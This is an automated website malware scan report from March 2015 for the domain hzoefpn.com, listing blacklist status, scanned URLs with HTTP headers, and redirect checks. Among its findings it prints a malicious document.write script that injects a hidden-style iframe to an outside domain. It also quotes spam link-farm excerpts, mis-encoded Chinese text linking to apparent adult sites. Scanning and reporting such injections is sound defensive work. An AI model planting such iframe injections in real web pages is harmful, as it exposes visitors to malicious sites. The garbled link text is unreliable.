Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=hzoefpn.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://hzoefpn.com/ | HTTP/1.1 200 OK Date: Thu, 05 Mar 2015 15:18:15 GMT Accept-Ranges: bytes ETag: "52c0e501813d01:379" Server: Microsoft-IIS/6.0 Content-Length: 19322 Content-Location: http://hzoefpn.com/index.html Content-Type: text/html Last-Modified: Mon, 08 Dec 2014 18:53:53 GMT X-Powered-By: ASP.NET | clean |
http://hzoefpn.com/index.html | 200 OK Content-Length: 19322 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: kojbhbf.com ...[2681 bytes skipped]... style="width:13%">ÉîÛÚÊÐÂó׿ÒË˼óÒ×ÓÐÏÞ¹«Ë¾</a> </div> </div> <div style="width:320px; margin:0px auto"> <a id="I7MfgL_rSwYK115340" href="http://6pq2ckt.com.cn" style="width:13%">ʯ¼ÒׯÊÐÑǼӴï½ðÊôÖÆÆ·ÓÐÏÞ¹«Ë¾</a> <a id="I7MfgL_rSwYK115340" href="http://olol7tk.com.cn" style="width:13%">ÉòÑô¼ÎÌìÒµÉÌóÓÐÏÞ¹«Ë¾</a> <a id="I7MfgL_rSwYK115340" href="http://kojbhbf.com" style="width:13%">º¼ÖÝÌúÁ÷Õæ¿ÕÖúÁ¦Æ÷ÖÆÔìÓÐÏÞ¹«Ë¾</a> <a id="I7MfgL_rSwYK115340" href="http://lo01y7m.com.cn" style="width:13%">»ÝÖÝÊиß˹Áú¾«Ãܵç×ÓÓÐÏÞ¹«Ë¾</a> <a id="I7MfgL_rSwYK115340" href="http://rtikdzx.com.cn" style="width:13%">½úÖÝÊÐË«ÐÇÎ޷IJ¼³§</a> <a id="I7MfgL_rSwYK115340" href="http://gedomyx.com.cn" style="width:13%">ÉîÛÚÊÐÂó׿ÒË˼óÒ×ÓÐÏÞ¹«Ë¾</a> </div> </div> <div class="C56a ...[1443 bytes skipped]... | ||
http://js.users.51.la/17434654.js | 200 OK Content-Length: 1930 Content-Type: application/x-javascript | clean |
http://js.lwtzdec.com/comcnindex.js | 200 OK Content-Length: 150 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: vip.hunlianyuan.com document.write("</iframe><iframe src='http://vip.hunlianyuan.com/1.html' rel='nofollow' scrolling='no' frameborder='0' width='100%' height='2000'>"); Decoded script: </iframe><iframe src='http://vip.hunlianyuan.com/1.html' rel='nofollow' scrolling='no' frameborder='0' width='100%' height='2000'> Malicious iFrame found. size: 100x2000 src: http://vip.hunlianyuan.com/1.html This URL is marked by Google as suspicious <iframe src='http://vip.hunlianyuan.com/1.html' rel='nofollow' scrolling='no' frameborder='0' width='100%' height='2000'> | ||
http://hzoefpn.com/tj.js | HTTP/1.1 200 OK Date: Thu, 05 Mar 2015 15:18:20 GMT Accept-Ranges: bytes ETag: "bbcc731513d01:379" Server: Microsoft-IIS/6.0 Content-Length: 1970 Content-Location: http://hzoefpn.com/404.html?404;http://hzoefpn.com:80/tj.js Content-Type: text/html Last-Modified: Mon, 08 Dec 2014 18:33:23 GMT X-Powered-By: ASP.NET | clean |
http://hzoefpn.com/404.html?404;http://hzoefpn.com:80/tj.js | 200 OK Content-Length: 1970 Content-Type: text/html | clean |
http://js.lwtzdec.com/comcn.js | 200 OK Content-Length: 244 Content-Type: application/x-javascript | clean |
http://www.qq.com/404/search_children.js | 200 OK Content-Length: 295 Content-Type: application/javascript | clean |
http://hzoefpn.com/page/ | HTTP/1.1 200 OK Date: Thu, 05 Mar 2015 15:18:23 GMT Accept-Ranges: bytes ETag: "924732fcb641d01:379" Server: Microsoft-IIS/6.0 Content-Length: 56538 Content-Location: http://hzoefpn.com/page/index.html Content-Type: text/html Last-Modified: Fri, 06 Feb 2015 02:45:36 GMT X-Powered-By: ASP.NET | clean |
http://hzoefpn.com/page/index.html | 200 OK Content-Length: 56538 Content-Type: text/html | clean |
http://js.users.51.la/17379071.js | 200 OK Content-Length: 1964 Content-Type: application/x-javascript | clean |
http://js.17meiliba.com/zt.js | 200 OK Content-Length: 410 Content-Type: application/x-javascript | clean |
http://hzoefpn.com/android/ | HTTP/1.1 200 OK Date: Thu, 05 Mar 2015 15:18:30 GMT Accept-Ranges: bytes ETag: "ba8ac8826344d01:379" Server: Microsoft-IIS/6.0 Content-Length: 55316 Content-Location: http://hzoefpn.com/android/index.html Content-Type: text/html Last-Modified: Mon, 09 Feb 2015 12:25:38 GMT X-Powered-By: ASP.NET | clean |
http://hzoefpn.com/android/index.html | 200 OK Content-Length: 55316 Content-Type: text/html | clean |
http://hzoefpn.com/android/9yo1n16068/ | HTTP/1.1 200 OK Date: Thu, 05 Mar 2015 15:18:32 GMT Accept-Ranges: bytes ETag: "baf8c9636344d01:379" Server: Microsoft-IIS/6.0 Content-Length: 24256 Content-Location: http://hzoefpn.com/android/9yo1n16068/index.html Content-Type: text/html Last-Modified: Mon, 09 Feb 2015 12:24:46 GMT X-Powered-By: ASP.NET | clean |
http://hzoefpn.com/android/9yo1n16068/index.html | 200 OK Content-Length: 24256 Content-Type: text/html | clean |
http://hzoefpn.com/android | HTTP/1.1 301 Moved Permanently Date: Thu, 05 Mar 2015 15:18:34 GMT Location: http://hzoefpn.com/android/ Server: Microsoft-IIS/6.0 Content-Length: 150 Content-Type: text/html X-Powered-By: ASP.NET | clean |
http://hzoefpn.com/test404page.js | HTTP/1.1 200 OK Date: Thu, 05 Mar 2015 15:18:34 GMT Accept-Ranges: bytes ETag: "bbcc731513d01:379" Server: Microsoft-IIS/6.0 Content-Length: 1970 Content-Location: http://hzoefpn.com/404.html?404;http://hzoefpn.com:80/test404page.js Content-Type: text/html Last-Modified: Mon, 08 Dec 2014 18:33:23 GMT X-Powered-By: ASP.NET | clean |
http://hzoefpn.com/404.html?404;http://hzoefpn.com:80/test404page.js | 200 OK Content-Length: 1970 Content-Type: text/html | clean |
http://hzoefpn.com/tv/ | HTTP/1.1 200 OK Date: Thu, 05 Mar 2015 15:18:35 GMT Accept-Ranges: bytes ETag: "5c8d181a445d01:379" Server: Microsoft-IIS/6.0 Content-Length: 53630 Content-Location: http://hzoefpn.com/tv/index.html Content-Type: text/html Last-Modified: Wed, 11 Feb 2015 02:43:24 GMT X-Powered-By: ASP.NET | clean |
http://hzoefpn.com/tv/index.html | 200 OK Content-Length: 53630 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: kojbhbf.com ...[3009 bytes skipped]... le="¹µºÄÎÑëÎÞÂë">¹µºÄÎÑëÎÞÂë</a></li> <li><a href="http://xtpv7gm.com.cn/Download/" title="Çó³åÌïÐÓÀæ?µÄÑÔÇéС˵">Çó³åÌïÐÓÀæ?µÄÑÔÇéС˵</a></li> <li><a href="http://eicoefg.com.cn/Download/" title="ÇÙ½ã">ÇÙ½ã</a></li> <li><a href="http://bjxaucf.com.cn/android/" title="°®Î¨ÕìbtС˵">°®Î¨ÕìbtС˵</a></li> <li><a href="http://kojbhbf.com/package/" title="ÈËÌåÒÕÊõÒùÍø">ÈËÌåÒÕÊõÒùÍø</a></li> <li><a href="http://ulkfyho.com.cn/client/" title="Öк«ÎÄÔÚÏß·Òë">Öк«ÎÄÔÚÏß·Òë</a></li> <li><a href="http://n25lzvr.com.cn/promotion/" title="С²ÖèÖ×Ó¿ì²¥µÚÒ»¼¯">С²ÖèÖ×Ó¿ì²¥µÚÒ»¼¯</a></li> <li><a href="http://kbpgoru.com.cn/promotion/" title="»ÆÉ«ÍøÕ¾xxeeecom">»ÆÉ«ÍøÕ¾xxeeecom</a></li> <li><a href="http://rmzdyua ...[1161 bytes skipped]... | ||
http://hzoefpn.com/tv/gbshlsc03628/ | HTTP/1.1 200 OK Date: Thu, 05 Mar 2015 15:18:37 GMT Accept-Ranges: bytes ETag: "b81d546aa445d01:379" Server: Microsoft-IIS/6.0 Content-Length: 24665 Content-Location: http://hzoefpn.com/tv/gbshlsc03628/index.html Content-Type: text/html Last-Modified: Wed, 11 Feb 2015 02:42:45 GMT X-Powered-By: ASP.NET | clean |
http://hzoefpn.com/tv/gbshlsc03628/index.html | 200 OK Content-Length: 24665 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: kojbhbf.com ...[2717 bytes skipped]... ><a href="http://aonrgoeng.com.cn/android/v8ch2y2362.html">¸ß³±Â¼Òô</a></li> <li><a href="http://lqz9iuo.com.cn/page/a53iv040315/">³ÉÈËÉ«ÇéÍøÕ¾µ¼º½´óÈ«</a></li> <li><a href="http://5h049ik.com.cn/page/">ÃÀÅ®ÎÞëÏÂÌåÈËÌåÒÕÊõ</a></li> <li><a href="http://w61j5gj.com.cn/promotion/">»Ø¼ÒµÄÓÕ»ó66</a></li> <li><a href="http://kojbhbf.com/egg/">°®ÔÚÒ»ÆðÈ«¼¯ÂéÀ±ÌÌ</a></li> <li><a href="http://ahrhglp.com.cn/promotion/">²ÝÁñÃÀ¹ú</a></li> <li><a href="http://vlbz0c9.com.cn/client/">×î½üheyzo0590</a></li> <li><a href="http://l43whl5.com.cn/start/">É« È˸óµÚËļ¾</a></li> <li><a href="http://0x9vtig.com.cn/newlinks/z9cnj1440.html">»¨ÓëÉßÈ«¼¯ÖÐÎÄ×ÖÄ»</a></li> <li><a href="http://fo ...[1426 bytes skipped]... | ||
http://hzoefpn.com/tv | HTTP/1.1 301 Moved Permanently Date: Thu, 05 Mar 2015 15:18:39 GMT Location: http://hzoefpn.com/tv/ Server: Microsoft-IIS/6.0 Content-Length: 145 Content-Type: text/html X-Powered-By: ASP.NET | clean |
http://hzoefpn.com/tv/4t6l3e022/ | HTTP/1.1 200 OK Date: Thu, 05 Mar 2015 15:18:40 GMT Accept-Ranges: bytes ETag: "7c302ddaa245d01:379" Server: Microsoft-IIS/6.0 Content-Length: 23429 Content-Location: http://hzoefpn.com/tv/4t6l3e022/index.html Content-Type: text/html Last-Modified: Wed, 11 Feb 2015 02:31:34 GMT X-Powered-By: ASP.NET | clean |
http://hzoefpn.com/tv/4t6l3e022/index.html | 200 OK Content-Length: 23429 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: hzoefpn.com
Result:
HTTP/1.1 200 OK
Date: Thu, 05 Mar 2015 15:18:15 GMT
Accept-Ranges: bytes
ETag: "52c0e501813d01:379"
Server: Microsoft-IIS/6.0
Content-Length: 19322
Content-Location: http://hzoefpn.com/index.html
Content-Type: text/html
Last-Modified: Mon, 08 Dec 2014 18:53:53 GMT
X-Powered-By: ASP.NET
...19322 bytes of data.
GET / HTTP/1.1
Host: hzoefpn.com
Result:
HTTP/1.1 200 OK
Date: Thu, 05 Mar 2015 15:18:15 GMT
Accept-Ranges: bytes
ETag: "52c0e501813d01:379"
Server: Microsoft-IIS/6.0
Content-Length: 19322
Content-Location: http://hzoefpn.com/index.html
Content-Type: text/html
Last-Modified: Mon, 08 Dec 2014 18:53:53 GMT
X-Powered-By: ASP.NET
...19322 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: hzoefpn.com
Referer: http://www.google.com/search?q=hzoefpn.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: hzoefpn.com
Referer: http://www.google.com/search?q=hzoefpn.com
Result:
The result is similar to the first query. There are no suspicious redirects found.